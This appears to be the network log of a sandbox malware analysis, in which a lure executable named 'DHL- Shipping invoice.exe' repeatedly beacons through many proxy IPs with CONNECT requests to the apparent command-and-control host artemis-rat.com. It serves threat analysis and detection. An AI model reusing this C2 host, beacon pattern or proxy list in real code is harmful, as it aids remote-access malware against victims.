                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            66192.168.2.449928185.49.30.580816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.839988947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            67192.168.2.44988135.154.71.7210806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.845213890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.124824047 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            68192.168.2.450052104.16.108.204806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.870434046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.957695961 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            69192.168.2.45004792.204.134.38544676484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.874313116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.202898979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.531009912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.171616077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.452917099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.840842962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.216705084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.860461950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.953421116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            70192.168.2.450059185.162.230.178806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.875767946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.963664055 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            71192.168.2.450065104.16.109.213806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.881766081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.970061064 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            72192.168.2.450068162.159.242.104806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.882432938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.970283985 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            73192.168.2.44986943.134.20.174156736484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.883228064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            74192.168.2.44997665.109.163.154806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.901459932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.156059980 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            75192.168.2.44991513.234.24.11631286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.907576084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.197921991 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            76192.168.2.450090162.223.94.164806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.911462069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.218765974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.531017065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.140400887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.343544006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.918337107 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:11 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            77192.168.2.450104104.16.105.15806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.921263933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.008940935 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            78192.168.2.45001488.99.138.2150886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.922084093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            79192.168.2.45009738.162.16.22131286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.923877001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.221640110 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            80192.168.2.450049199.229.254.12941456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.931200981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            81192.168.2.45013866.45.246.19488886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.942956924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            82192.168.2.45002145.138.87.23810806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.944942951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            83192.168.2.45006392.205.110.47171586484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.962826014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.437227964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.968497992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            84192.168.2.44998089.35.237.18788886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.964303970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.629333973 CET75INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Length: 0
                            Mar 12, 2024 08:37:01.337052107 CET103INHTTP/1.1 400 Bad Request
                            Content-Type: text/plain; charset=utf-8
                            Connection: close
                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                            Data Ascii: 400 Bad Request


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            85192.168.2.450056142.54.237.3441456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.980941057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            86192.168.2.45016766.228.33.190174646484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.982536077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.280987024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.593516111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            87192.168.2.450051176.77.9.2256786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.986058950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            88192.168.2.450080130.162.213.17580806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
